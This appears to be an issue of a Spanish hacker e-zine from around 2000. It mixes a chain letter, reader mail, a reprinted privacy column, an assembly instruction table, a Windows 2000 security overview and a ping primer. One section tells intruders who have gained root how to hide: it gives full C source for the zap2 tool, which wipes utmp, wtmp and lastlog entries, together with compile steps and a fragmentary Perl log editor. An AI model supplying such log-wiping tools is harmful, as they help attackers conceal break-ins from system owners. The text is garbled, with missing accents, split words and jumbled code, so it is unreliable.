22 Cuando te das cuenta que has cometido un error, corrgelo inmediatamente. 23 Sonre cuando contestas al telfono. El que te Ilama le sentir por el sonido de tu VOZ. 24 Csate con un hombre/mujer que tenga conversacin. Cuando seis viejos, vuestra cap acidad para conversar ser lo ms importante. 25 Pasa un poco de tiempo solo. 26 S abierto a los cambios, pero no por ello olvides tus valores. Recuerda que a veces el silencio es la mejor de las respuestas. 27 Lee ms y ve menos la televisin. 28 Vive una buena vida honorable. Cuando seas viejo, recordars el pasado y te ser grato. 29 Ten confianza en Dios, pero cierra bien las puertas de tu coche. 30 Una atmsfera amorosa es importante en casa. Haz lo posible para crear un ambie nte tranquilo y armonioso. 31 En caso de desacuerdo con la gente de tu entorno, da importancia a la situacin presente. 32 No remuevas el pasado. 33 Lee entre las lneas. 34 Comparte tus conocimientos. Es una forma de obtener la inmortalidad. 35 S bueno con el planeta. 36 Reza. 37 No interrumpas a quien te muestre afecto. 38 Ocpate de tus asuntos 39 No confes en un hombre/mujer que no cierre los ojos cuando te besa. 40 Visita una vez al ao un lugar que no conozcas. 41 Si ganas mucho dinero, pon una parte a disposicin de otros para ayudarles mien tras ests vivo. Es la mayor satisfaccin que la fortuna pueda darte. 42 Recuerda que no obtener lo que quieres cuando quieres, es a veces una suerte. 43 Aprende todas las reglas pero infringe una de cuando en cuando. 44 Recuerda que la mejor de las relaciones es aquella en que el amor entre dos p ersonas es mayor que la necesidad que tiene el uno por el otro. 45 Evala tu xito en funcin de aquello a lo que tienes que renunciar para alcanzarlo . 46 Enfoca el amor y la cocina con cierto abandono temerario. No guardes este mensaje. El TOTEM MANTRA debe estar lejos de tus manos dentro de las 96 horas. Enva alguna s copias y observa lo que te ocurre en los prximos cuatro das. Es verdad incluso si no eres supersticioso. Y ahora el resto... Enva ese mensaje - AI menos 5 personas y tu vida va a mejorar. 0-4 personas: tu vida va a mejorar sensiblemente. 5-9 personas: tu vida mejora y se cumplen tus previsiones. 9-14 personas: recibirs al menos 5 sorpresas en las 3 semanas siguientes. 15 o ms: tu vida mejorar drsticamente y todo aquello con lo que siempre soaste comen zar a tomar forma. ================================================================================ ============ Respuesta de Wataru: oye seth dile algo bonito y que no me envie chorradas de estas, que los emilios son para consas serias. k-2000@wanadoo.es Seth: Ya sabeis su direccion. As ke enviadle si os apetece vuestro comentario. Si lo hemos puesto aki es por la curiosidad del Mantra: Una de las culturas ke apr eciamos y ke nos parece interesante. Segn dicen, cada uno posee su Mantra. Yo no poseo el mantra de arriba. : ---------------------------------------------------------------------------cut here... ----------------------------------------------------------------------------

Holas gente! Saludos desde Kolombia, Suramerika, enkontre su e-zine por medio de vanhackez y me parece ke son de los pokos ke ralmente sirven en esta kosa del underground. Me gustaria poder ayudar en el e-zine con traducciones del ingles al espaol de kualquier artikulo, si es posible realmente me gustaria ayudarlos ^_^. Gracias! Respuesta: Muchas gracias. Pues adelante. Si kieres enviar un articulo a la ezine adelante. Nos gusta ke la gente colabore con nostros, pues seguimos pensando ke esta es l a ezine de todos y para todos, y sobre todo para los cyberpunks hispanos, ke som os pocos. El tema... pues si. Puede ser Underground... el tema realmente lo elig es tu. ---------------------------------------------------------------------------cut here... ---------------------------------------------------------------------------Este texto fue extraido del boletn de noticias de Hispasec sobre seguridad, me ha parecido tan interesante ke ahora lo incluimos aqu para aquellos que no han podi do leerlo. Espero que os guste, pues es muy interesante: Piratas de chaqueta y corbata ----------------------------Cuando uno se asoma a los grandes medios de comunicaciones, el asombro surge cuando Internet aparece identificada con el fraude, la delincuencia, la pornografa infantil o los grandes pelotazos. El pblico en general que nunca se ha sentado ante un ordenador ni ha navegado por la Red, termina por asociarla con antro de criminales o escenario de pelotazos multimillonarios. Como consecuencia, los usuarios que navegan desde sus casas, el usuario de a pie que paga religiosamente el portazgo a Telefnica, comienza a dudar y se pregunta: existe riesgo real en Internet o no?, de qu naturaleza? Los grandes peligros de la Red se pueden agrupar en tres categoras: amenazas a su intimidad y a sus datos de carcter personal; amenazas a la seguridad de su informacin y de sus activos informticos; y por ltimo, amenazas a su bolsillo, en forma de robos, fraudes y timos. Internet no es sino un espejo de la sociedad, que refleja sus miserias y sus bondades. En este artculo nos ocuparemos del primer peligro. Cuando nos explican de dnde procede el riesgo para nuestra intimidad se nos habla de las cookies, el lobo feroz de Internet que supuestamente devora con avidez datos acerca de los navegantes; de los agujeros de los navegadores, que permiten en teora hacerse con informacin del usuario; o de los troyanos que instalados en nuestro ordenador abren distintos puertos por los cuales filtrar informacin a piratas barbilampios acurrucados en sus cubiles iluminados por la fosforescencia de la pantalla del monitor. Hay que reconocer que esos peligros son reales, pero remotos, siendo insignificante el volumen de internautas afectados por ellos. El verdadero peligro para la intimidad del usuario es su propia ingenuidad. Demasiado a menudo introduce sus datos personales a la ligera en el primer formulario que se le presenta. Es un problema de buena fe y exceso de confianza. Hay que saber sopesar qu datos se dan, a quin y para qu. Piense que cuando se le hacen todas esas preguntas para entrar en el sorteo de un fantstico reproductor de MP3, la motivacin oculta detrs de esa peticin es hacerse con informacin

demogrfica: su nombre y apellidos, dnde vive, cul es su telfono, su DNI, sus ingresos, etc. De verdad quiere dar todos esos datos para participar en un sorteo? Tenga en cuenta que esa informacin, vinculada a sus correras por la Red, le identifican no ya como una annima direccin IP o un nmero en una cookie, sino como una persona sobre la que se conocen sus datos fundamentales. Consideremos el caso de la reciente fiebre (o epidemia) de los portales: Terra (Telefnica), Navegalia (Airtel), Alehop (Retevisin), Ya.com (Jazztel), todos se han lanzado a presentar sus megapuertas de acceso a Internet. Acceso gratuito, noticias gratuitas, correo gratuito, pgina web personal gratuita, todo es gratuito, todo a favor del usuario, todo por el usuario y para el usuario y sin cobrar ni un duro. Nunca se ha preguntado por qu una compaa como Telefnica ofrece servicios a primera vista gratuitos? Recuerda cuando Telefnica ofreci gratuitamente contestador automtico a sus abonados? Qu chollo! Gratis! De veras? Piense que antes de ese servicio, cuando llamaba a un telfono y nadie responda, la llamada se perda sin beneficio para Telefnica. Ahora, salta el contestador (tantas pesetas por establecimiento de llamada), espera a or el mensaje (tantas pesetas por un minuto de llamada) y a veces hasta deja uno (tantas pesetas ms por el tiempo que ha utilizado la lnea). Y no digamos a cunto montan esas pesetitas si la llamada es interprovincial o desde mvil a hora punta. Se da cuenta de los millones de ingresos al da que supone? Dnde queda la gratuidad? Cuando la boa constrictor cie sus anillos alrededor de su vctima, al espectador puede parecerle que est abrazandola, cuando en realidad se est preparando para estrujarla. El primer precio que paga por esos servicios gratuitos de los portales es su informacin personal. El caso de Alehop es casi patolgico: incluso exigen el DNI del que solicita su servicio de correo, adems de su nombre completo, fecha de nacimiento, telfono, profesin, sexo y domicilio, con cdigo postal incluido. Todo ello sin una poltica de proteccin de datos claramente establecida. Qu necesidad hay de entregar toda esa informacin a cambio de una triste cuenta de correo Web, que no puede compararse en prestaciones y servicios a la que por ejemplo ofrece Correo Yahoo! (www.yahoo.es) sin pedir datos personales a cambio? Si confiadamente rellena todos los formularios, en adelante, cuando navegue por los megaportales, que concentran una buena parte de los servicios que puede desear en Internet, el rastro que va dejando desde su ordenador ser fcilmente vinculable a una persona con nombres y apellidos. Si lee noticias sobre ftbol, en la tienda virtual compra material deportivo y en el chat no para de hablar sobre los resultados de los partidos del da anterior, no se extrae si luego le llega publicidad sobre deportes. Estos datos formarn parte de una base de datos para ser utilizados con fines de promocin y comercializacin de servicios de la compaa. Y todo por una direccin de correo Web? Que no le engaen! Siempre que no sea absolutamente necesario para poder recibir el servicio, d datos falsos. Que no jueguen con su informacin personal. No caiga en la trampa de los sorteos o en el camelo de los servicios gratuitos. Si quiere comprar algo a travs de Internet, evidentemente deber dar una direccin postal real y un nmero de tarjeta de crdito vlido. Pero nunca responda a preguntas improcedentes, como su profesin o ingresos anuales. Tiene sentido que le pregunten por la velocidad de su mdem, pero nunca por su religin o por su estado civil. Recuerde, el volumen y carcter de los datos solicitados deben corresponderse

con el servicio prestado. Si no son imprescindibles para que el servicio funcione correctamente, no revele su identidad, d datos falsos, aunque plausibles. Que no le controlen ms. No es probable que las compaas que ofrecen esos servicios utilicen sus datos ms all del fin con que los recaban, es decir, marketing personalizado para cobrar ms a sus anunciantes. Sin embargo, conocida la pattica seguridad de sus sistemas, quin garantiza que no sern usados por empleados desleales o por alguna organizacin criminal? Como anunciaba Hispasec hace unos das, "en lo que podemos considerar un grave fallo de seguridad y un gran error por parte de Telefnica, incluso contradiciendo toda la normativa legal al respecto, los datos de las facturas de cualquier abonado de Telefnica, lo que incluye nombre, direccin, NIF, e incluso cuenta bancaria y desglose de llamadas, quedan accesibles a la consulta de un navegador". Quin necesita hackers con compaas as? Hoy en da, los piratas tecnolgicos no llevan parche en el ojo ni pata de palo, visten con caros trajes de Ermenegildo Zegna y se sientan en grandes despachos. Controlan los medios de informacin, las finanzas y muy pronto Internet. Y los hackers tan malos de las revistas? Pobrecitos, comen migajas mientras los otros se dan el banquete. Pues no les queda. Gonzalo lvarez Maran criptonomicon@iec.csic.es Boletn Criptonomicn #66 http://www.iec.csic.es/criptonomicon

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 06. ************************************************** * "INSTRUCCIONES DEL LENGUAJE ENSAMBLADOR" * * Autor: Ivan Vazquez Caballero [1999/2000] * * Bibliografia: Lenguajes ensambladores * ************************************************** INSTRUCCIONES DE TIPO: Transferencia de Datos Trans.Generales Instruccin: Pagina MOV: Realiza una copia del origen y la transfiere al destino 86 PUSH: Apila el operando Origen(Decremento 2bytes SP y copia) 87 POP: Transfiere SS:[SP] al destino y se incrementa en 2 SP 87 XLAT: Copia una posicin de memoria(BX)en AL,Equ.AL:=[BX][AL] 88

XCHG: Intercambia datos de los 2 registros escritos(ej.AX,BX)

90

Trans.Direciones Instruccin: Pagina LEA: Devuelve la direccin de la variable especificada 90 LDS: Usa una variable como puntero y la transfiere sobre DS 91 LES: Usa una variable como puntero y la transfiere sobre ES 91 Trans.Reg.FLAGS Instruccin: Pagina LAHF: Ins. de consulta o visualizacin de estado de banderas 92 SAHF: Nos permite situar valores en las banderas(flags) 92 PUSHF: Apila los dos bytes del registro de banderas(SP=SP-2). 93 POPF: Desempila sobre el registro de flags(inversa de PUSHF) 93 INSTRUCCIONES DE TIPO: Aritmeticas Operaciones de Adicin Instruccin: Pagina ADD: Suma el operando fuente al destino. 94 ADC: Igual que la instruccin ADD pero esta cuenta el acarreo 94 INC: Incrementa en 1 el operando destino(destino=destino+1) 95 AAA: Ajustar el resultado de la suma de 2 bytes a ASCII 95 ADD: Ajustar el resultado de la suma de 2 bytes a Decimal 96 Operaciones de Substraccin Instruccin: Pagina

SUB: Resta el operando fuente al destino. 97 SBB: Igual que la instruccin SUB pero esta cuenta el acarreo 97 DEC: Decrementa en 1 el operando destino(destino=destino-1) 97 AAS: Ajustar el resultado de la resta de 2 bytes a ASCII 98 DAS: Ajustar el resultado de la resta de 2 bytes a Decimal 98 Operaciones de Multiplicacin Instruccin: Pagina MUL: Operacin de multiplicacin sin signo(AX=AL*fuente). 99 IMUL: Misma funcin que MUL pero tiene en cuenta el signo 99 AAM: Ajusta sobre AX para que el resultado sea ASCII 99 Operaciones de Divisin Instruccin: Pagina DIV: Operacin de Divisin sin signo(AX=AL/fuente). 100 IDIV: Misma funcin que DIV pero tiene en cuenta el signo 100 AAD: Ajusta sobre AX para que el resultado sea ASCII 100 Otras operaciones Instruccin: Pagina NEG: El operando destino cambia de signo(destino=0-destino) 101 CMP: Realiza una substraccin pero sin alterar operandos 101 CWD: Si AX=0 hace DX=0ffh.SI AX=1 hace DX=00h( Word x Dword) 102 CBW: Si AL=1 hace AH=0ffh si no AH=00h 102

Operaciones de Lgicas

Instruccin: Pagina AND: "y" Logico el cual opera el operando fuente y destino 102 OR: "o" Logico el cual opera el operando fuente y destino 102 XOR: "o-ex" Logico el cual opera el operando fuente y destino 103 TEST:"y" Logico entre operando1 y 2 estos no se modificaran 104 NOT: Efectua operacin de complementacin bit a bit(O.L.U) 105 Operaciones de Desplazamiento y rotacin Instruccin: Pagina SAL: Desplazamiento a la Izquierda "contador" del un destino 105 SHR: Desplazamiento a la Derecha "contador" del un destino 106 SAR: Desplazamiento a la Derecha repite, en posicion +signifi 107 ROL: Rotacin a la Izquierda tantas veces como contador. 108 ROR: Rotacin a la Derecha tantas veces como contador. 108 RCL: Rota a la derecha tambien el bit de carry(8+1=9 bites) 109 RCR: Rota a la izquierda tambien el bit de carry(8+1=9 bites) 109

INSTRUCCIONES DE TIPO: Transferencias de control

Incondicionales

Instruccin: Pagina JMP: El Proceso salta a una posicin de memoria indicada 110 CALL:Igual que JMP pero guarda en la pila la Posicion retorno 113 RET: Retorna a la posicin inicial una vez se sale de rutina 113 IRET:Igual que RET pero restaura IP,CS y registro flags 115 INT: Crea una interrupcin por software semejante a rutinas 115

Condicionales

Instruccin: Pagina INTO: Es una llamada a la interrupcin 4 (desbordamiento) 116 JA: Salta si CF=0 y ZF=0(se utiliza precedida de CMP) 117 JB: Salta si CF=1 (Jump is below) 117 JAE: Condicin opuesta a JB, salta si CF=0 118 JBE: Salto condicionado a ZF=1 o CF=1. 118 JE: Salto condicionado a ZF=1. 119 JNE: Condicion opuesta a JE, ya que esta condicionado a ZF=0 119 JG: Salto de control si ZF=0 y SF=OF 120 JLE: Condicion opuesta a JG ZF=1 y SF<>OF 121 JGE: Condicion opuesta a JLE oper1>=oper2, SF=OF 122 JNO: Si no ha habido desbordamiento salta hacia el desplazm. 122 JO: Condicion inversa a JNO.Dicho de otra forma si OF=1 122 JNP: Condicion de salto si PF=0(jump if not parity) 122 JP: Condicion inversa a JNP, ose si PF=1(paridad par). 123 JNS: Transfiere el control a IP+desplazamiento, SF=0 123 JS: Condicin inversa a JNS,osea salta si SF=1 123 JCXZ: Si CX=0 se transfiere el control a JP+ desplazamiento 123

Iterativas Instruccin: Pagina LOOP: Decrementa registro CX, si CX>0 efectua salto IP+desp 124 LOOPE: Igual que LOOP ademas ZF=1,y si CX=0 o ZF=0 continua 125 LOOPNE:Es la condicion inversa a LOOPNE, ZF=1 no efectua oper 125

INSTRUCCIONES DE TIPO: Tratamiento de cadenas

Instruccin: Pagina REPE: Decrementa registro CX, y repite si CX>0 y ZF=1 126

REPNE: Inversa de REPNE repite la operacion a la que precede 126 CLD: Clear DF, Pone a 0 el bit DF 126 STD: Set DF, que pone a 1 el bit DF 126 MOVSB: Usada para copiar una cadena un String 127 MOVSW: Igual a MOVSB pero esta copia a nivel de palabra(WORD) 127 MOVS: Si la cadena esta a nivel de byte lo traduce al codigo 127 CMPSB: Compara el dato direccionado por DS:SI con ES:DI 127 CMPSW: Igual que CMPSB pero esta compara palabra a palabra 129 CMPS: Equivalente a CMPSB o CMPSW dependiendo de la def.cade 129 SCASB: Compara el contenido de AL con el direccionado ES:DI 129 SCASW: Compara el contenido de AX con el direccionado ES:DI 129 SCAS: Equivalente a SCASB o SCASW dependiendo de la def.cade 130 LODSB: Copia contenido del byte direccionado por DS:SI en AL 130 LODSW: Copia contenido de word direccionado por DS:SI en AX 130 LODS: Equivalente a "W o"B dependiendo de la definicion 131 STOSB: Inversa de LODSB trasnfire el acumulador a memoria 131 STOSW: Almacena contenido de AX en memoria direcc. por ES:DI 131 STOS: Equivalente a "W o"B depende del caracter del argument 131 IN: Envia del puerto de entrada a pos direcc. por ES:DI 131 OUT: Envia al puerto de salida el contenido de direc ES:DI 132

INSTRUCCIONES DE TIPO: CONTROL DEL PROCESADOR Operaciones con Flags Instruccin: Pagina CLC: Pone a 0 el flag CF(clear carry) 132 CMC: Invierte el CF, osea si tenia valor 1 pasa a 0 y vicever 132 STC: Pone a 1 el CF(Set carry) 132 CLD: Pone a 0 el bit de direccion DF(clear direction) 133 STD: Pone a 1 el bit de direccion DF(set direction) 133 CLI: Inhibe las interrupciones externas poniendo los IF a 0 133 STI: Habilita las interrupciones enmascarables, pone IF a 1 133 HTL: Para al procesador hasta que le llegue una int.externa 134 WAIT:Para el procesador hasta recibir una seal TEST 134 LOCK:Impide que otros coprocesadores accedan a recursos comp. 134 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

######################### # 07. HAcerse invisible #

######################### Uno de los puntos bsicos de seguridad del hacker es apreciar su propia seguridad para no ser localizado y para que no le caiga un marrn encima. No hagas el lamer y aprende a ocultarte como es debido, si tu no limpias tus arc hivos utmp o wtmp, xferlog's, etc ... puedes cagarla (estoy hablando de Linux) y adems puedes perder tu acceso al sistema que tanto te lo has trabajado. As que de bes borrar tu presencia en los sistemas que pasas, conviertelo en tu rutina, sol o asi puedes salvarte de un buen susto. Hay diferentes mtodos de limpiar los sistemas, te voy a dar unos cuantos mtodos. Empecemos por los zappers: Pequeos programas que t ayudan a esta tarea de "limpia r" tus rastros babosos como si fuera un caracol comiendo una lechuga al llegar l a primavera. Zap2 (para wtmp/lastlog/utmp) Antes de nada debo aconsejarte algo. Cuando consigas meterte en un sistema y met as el zapper, no le llames por ejemplo mi_zapper. Que el root, aparte de reirse de ti durante una noche larga vendr personalmente a tu casa a pegarte de ostias h asta cansarte, yo si fuera root lo hara. As que renombra los programas por ejemplo a z2 o algo as, ke kede discreto, vamos. Cuando consigas root, con el programa deberias ejecutarlo de esta manera (antes compilalo): ./z2 username-u-logged-in-as Si no sabes con que username has entrado haz un finger a la makina (si est en fun cionamiento el puerto 79). Luego, despues de hacer esto prueba con hacer un who o un w a la makina desde de ntro para saber si estas oculto. En el programa z2.c puedes encontrar esto: #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" Muchos sistemas tb estn de esta forma: #define WTMP_NAME "/var/adm/wtmp" #define UTMP_NAME "/var/adm/utmp" #define LASTLOG_NAME "/var/adm/lastlog" Esto kiere decir ke en la linea #define WTMP_NAME "/var/adm/wtmp por ejemplo, te est declarando o ddefiniendo el archivo "wtmp" del sistema que has entrado, en s u directorio /var/adm/. Y ese ser el archivo que va a limpiar. Por supuesto hay o tros que te dejan huellas de tus fechoras, pero de eso ya hablaremos ms tarde. SI sabes de otros archivos que marcan tus pasos puedes incluirlo en el programa con el #define, el nombre del archivo y donde se encuentra. Como arriba te indic o. Este es el programa en .c z2.c --------------------------- cut here #include <sys/types.h> #include <stdio.h> #include <unistd.h> #include <sys/file.h> #include <fcntl.h> #include <utmp.h> #include <pwd.h>

#include <lastlog.h> #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); }

void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f);

void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll ));

} }

write(f, (char *)&newll, sizeof( newll )); close(f);

} else printf("%s: ?\n",who);

main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); } --------------------------- cut here Para compilarlo debes usar: gcc z2.c -o z2 Mira que compilador tiene el sistema, a lo mejor no tiene el gcc sino el egcs, p or ejemplo. Por lo tanto deberias empollarte la utilizacion de algunos compilado res de C para linux. Nunca se sabe. Aunke normalmente todos tienen una manera de compilar: nombre_compiador archivo.c -o nombre_ejecutable.

Bueno, hasta aki se entiende, no? Hay buenos Perl Scripts que te pueden ayudar y complementar esta tarea, vamos a uno de ellos. Los mejores Perl Scripts estan sometidos a editar los utmp o wtmp y ademoas a chekearlos, por si hubiera algun tipo de error. Entonces, si tu necesitas jugar un ratito, puedes aadir aznar.moncloa.com logging dentro del puerto ttyp3. ;) Bueno, vamos a hablar de algunos comandos bsicos: starts by loading wtmp delete user username delete host hostanme write read wtmp delete user username delete host hostname write Estas son algunas tareas de este perl script que tanto te comento. Ahora te voy a dar el codigo del perl, lo compilas y.... a jugar!!! -----------------------start of utmpman.pl #!/usr/bin/perl -w # # Variable defines.

my($utmp_location) = "/var/run/utmp"; my($wtmp_location) = "/var/log/wtmp"; my($shells_location) = "/etc/shells"; my($ttybase) = "tty"; my($ttyrange) = "pqrs"; s. my($ttyports) = "012345657689abcfef"; s. # Global initializations. my($active_file) = ""; my(%entries) = {}; my(@cmdline) = (); my(@shells) = (); # Display banner. print "\nutmp Manager v0.8\n\n";

# TTYrange standard on most linux system # TTYports standard on most linux system

# Access check. die("utmpman :: You must be root to run this application!\n") unless ($> == 0); # Read in valid shells. if (defined($shells_location)) { open(SHELLFILE, "<$shells_location"); @shells = <SHELLFILE>; close(SHELLFILE); } # Process "basename" of each shell. @shells = map( { /([^\/\n]+)\n*$/; $1; } @shells); print push(@shells) . " valid shells in $shells_location: @shells\n" if (defined (@shells)); readfile("$utmp_location"); print("\nutmpman: $active_file> "); while (<STDIN>) { process_cmd(split); print("\nutmpman: $active_file> "); } sub process_cmd { return if (!defined(@_)); my(@line) = map { lc($_) } @_; $_ = shift(@line); SWITCH: { /^check$/ && do { check_func(@line); last SWITCH; }; /^delete$/ && do { del_func(@line); last SWITCH; }; && do { help_func(); last SWITCH; };

/^help$/

/^insert$/

&& do { ins_func(@line); last SWITCH; }; && do { list_func(@line); last SWITCH; }; && do { read_func(@line); last SWITCH; }; && do { write_func(@line); last SWITCH; };

/^list$/

/^read$/

/^write$/

/^quit|exit$/ && exit(0); # DEFAULT. print ("Invalid command.\n");

# HELP sub help_func { print << "EOM";

----------------------cut here. Bueno, y este ha sido el programa. Tb he conseguido algunas cosas muy ricas, el utmpManager Help. Pero como soy muy vago no lo he traducido, asi ke te lo pongo aki y tu te lo lees si kieres. De t odas maneras, ahora hay distribuciones Linux ke tiene el utmpManager Help traduc ido en espaol. Nota: Si tu quieres traducir documentos o textos de Underground o cyberpunk a nu estro idioma, hazlo, enviamoslo y nosotros lo publicaremos aki gustosamente. utmpManager Help ---------------Note: - <n> is an argument. - [id=] is a token which expects a value as part of command (ie, insert id=p5 user=root 11/23/96). See the insert command. - A line is the full name to the tty port, ie ttyp0. - An id is the *unique* representation of the port (without the tty, etc), ie "p0" (for ttyp0). check - Perform user consistancy check. Use this to make sure that the data in utmp agrees with who is actually on the machine. This is useful in determining if a user is online with hidden ports, running nohup'd

processes, or running iScreen. delete <x>-<y> - Delete entries #x to #y. delete host <host> - Delete *all* entries which match the substring <host>. delete line|id <line|id> - Delete entry containing <line> or <id>. insert {id=|line=} [type=] [user=] [host=] [ConnTime] {LogoffTime} - Insert an entry into utmp/wtmp files specifying any combination of id/line, type, username, host, connection time, and logoff time. (LogoffTime only valid for WTMP files.) list host <host> - List all entries matching the substring <host>. list line|id <line|id> - List all entries matching <line> or <id>. read utmp|wtmp|<filename> - Read entries from either default wtmp, default utmp, or an arbitrary filename. Note: arbitrary filenames MUST start with either "utmp" or "wtmp" to be used with this editor. Rename files *outside* of this editor if necessary. If read is executed without any arguments, it rereads the last given filename, which is displayed on the prompt. write {filename} - Write entries to file {filename}. If write is executed without any arguments, then entries will be written to the last given filename, which is displayed on the prompt.

Te podria dar miles de Perl Scripts con tareas ya realizadas incluso programas e n .c, pero... no te lo voy a dar todo hecho, no? Todos debemos trabajar un pokit o en nuestras aportanciones Hack. Bueno, y esto ha sido todo por hoy. Gracias por estar aki y por haberme elegido. As son las cosas y asi se las hemos contado...uy! A ke me suena esto??? Para escribirme: chuky666@hotmail.com. Ke te conteste o no ya es otra cosa... @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

############################## # 08. SEGURIDAD EN WIN2000 # ############################## Bueno, ya tengo en mis manos, la nueva plataforma que nos ofrece nuestro amigo G uillermo puertas, el ex director de Maicrosoft. El Windows 2000, que a decir ver dad en muchos aspectos mejora, pero como casi siempre deja mucho que desear. El mismo da de su presentacin, le entregaron unos aficionados, un estudio con 65.000 bugs que haban encontrado tras un tiempo de anlisis, y seguro que encontraremos ms. Bueno pues en este artculo, como no, os hablar de lo que mas nos interesa a nosot

ros, a saber: sistema de ficheros y SEGURIDAD, esto ltimo con maysculas. Las mejoras en el sistema de ficheros son destacables, muchas de las tareas que antes se tenan que hacer con otros programas ahora las incluye el SO. Cuotas de d isco, cifrado y compresin de datos estn integrados en el sistema de ficheros. Wind ows 2000 tambin soporta la replicacion y sincronizacion de archivos gracias a Int ellIMirror, que permite trabajar con ficheros, aplicaciones y preferencias compa rtidos. Si un cliente se desconecta de la red, puede operar normalmente y, cuand o esta vuelve a estar operativa, se sincronizaran los datos y prefrencias automti camente. En cuanto a sistemas de archivos distribuidos, se mejora el soporte Dfs presenta do como extra bajo Windows NT 4.0. Esto es en pocas palabras un servicio que cap acita al administrador para ofrecer una vista lgica de los recursos. En el tema d e nivel Usuario, simplemente consiste en acceder a todos los recursos de disco d esde un nodo. Por otro lado facilita bastante las tareas del administrador que t iene la sustitucin y mantenimiento de los dispositivos mucho mas fcil porque estos aparecen como una rama del directorio. Tambin facilita otras tareas pero son de menor importancia como: la replica de directorios. SEGURIDAD /PKI La infraestructura de clave publica (osea, Public key infrastructure) ta mpoco es nueva ya que aparece en el NT antes mencionado, desde que se lanzo el o ption pack. Este incluye el servidor de certificados o entidad certificadora (CA ) y soporte SSL, del que dispone Internet Explorer desde que apareci. Pero algo c ambia para despistar al contrario y es que todo se encuentra mas integrado debid o al Directorio Activo y al Mejor soporte LDAP. Otra cosa nueva es el soporte para tarjetas inteligentes (smartcards), q ue no son mas que simples placas que cualquier ejecutivo desconfiado puede lleva r en su cartera y ponerlos cerca de su corazn y en la mesilla de noche y darle u n beso antes de irse a dormir, tiene un chip dorado que conserva algunos datos c omo la autentificacion dentro del sistema o los permisos. Gracias al almacenamie nto de la parte privada de la clave en la tarjetita, la autentificacin es automtic a. Osea que si tenemos esa tarjeta el ordenador nos identifica al momento ante s u sistema y podemos acceder a sus recursos, informacin y su entorno desde cualqui er mquina. Adems estas tarjetas son capaces de retener cualquier clave de encriptaci on, como la del propio PGP (y no me preguntis que es esto del PGP, que ya deberais de saberlo), de esta manera nos podemos llevar nuestros algoritmos con nosotros , trabajar con ellos el cualquier ordenata. Esto unido al soporte para dicha aut entificacion, que se puede realizar usando unidades lectoras que utilicen el pue rto RS232 o USB, pone a este SO un poquito por delante de otros en cuanto a segu ridad. Este sistema de cifrado es el mismo que se emplea a la hora de encriptar los archivos del ordenador, eliminando la posibilidad de que alguien se salte lo s permisos y obtenga informacin de forma desautorizada, que no creo que haya nadi e con esas intenciones ;). Bueno, pues aunque alguien se bote estos sistemas, qu e se pueden botar hacedme caso, y accediera a estos archivos, se podra hacer una paja con ellos porque no le serviran para nada mas porque al no tener la clave pr ivada no podra ver el contenido de estos. Pero no desesperis, cuanto mas alta es l a barrera mas salto, cuanto mas fuerte es la puerta mas ganas tengo de abrirla, cuanto mas se enfadan mas me divierto, cuanto mas me pegan mas fuerte me hago, c uanto mas restringen mi acceso mas curioso me vuelvo, que las alas de la liberta d del acceso remoto no pierdan ni una de sus plumas, dadme tiempo y todo se anda r. Wataru.

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ############## # 09. PING # ############## PING pOr DAn_^^ Ping (Packet INternet Groper) es una herramienta de gran utilidad en redes TCP/IP. Si la usamos de una forma adecuada nos permite detectar problemas como pueden ser el cableado de una red , saber la sobrecarga de estos en la red , etc... que hace el PING? Lo que hace ping es preguntar al dispositivo de la red remota estas ahi? y este le contesta inmediatamente si. El PING nos informa del tiempo que ha tardado en contestar si tarda demasiado en contestar o no lo hace puede ser que este apagado Si un tramo de red se encuentra muy saturado obtendremos altos tiempos de respuesta y muchos request timed out. Cada request timed out recibido indica un paquete de datos que no ha llegado a su destino. Supongamos que estas intentando conectar a una BBS por telnet es posible que esta maquina se encuentre desconectada pues antes de perder mas tiempo intentando conectar deberias averiguar si se encuentra accesible. si el programa ping no gestiona la resolucion de nombres por dominio (DNS) deberas utilizar un programa para obtener la direccin IP y luego ejecutar ping. El tiempo de respuesta al efectuar PING contra una maquina de vuestra LAN (red local, habitualmente de 10 Mbits) suele ser de 1 o 2 ms. Si al realizar 10 pings obtenemos timed out en todos ellos, casi con toda seguridad, podriamos afirmar que este servidor o la conexion entre nuestra maquina y la del servidor, se encuentra desconectada. Bueno esto es una pequea introduccion al ping espero que os halla servido de ayuda de todas formas si teneis alguna duda o comentario enviarme un mail a NETWORKING@teleline.es. Hasta otra ;) By DAn_^^

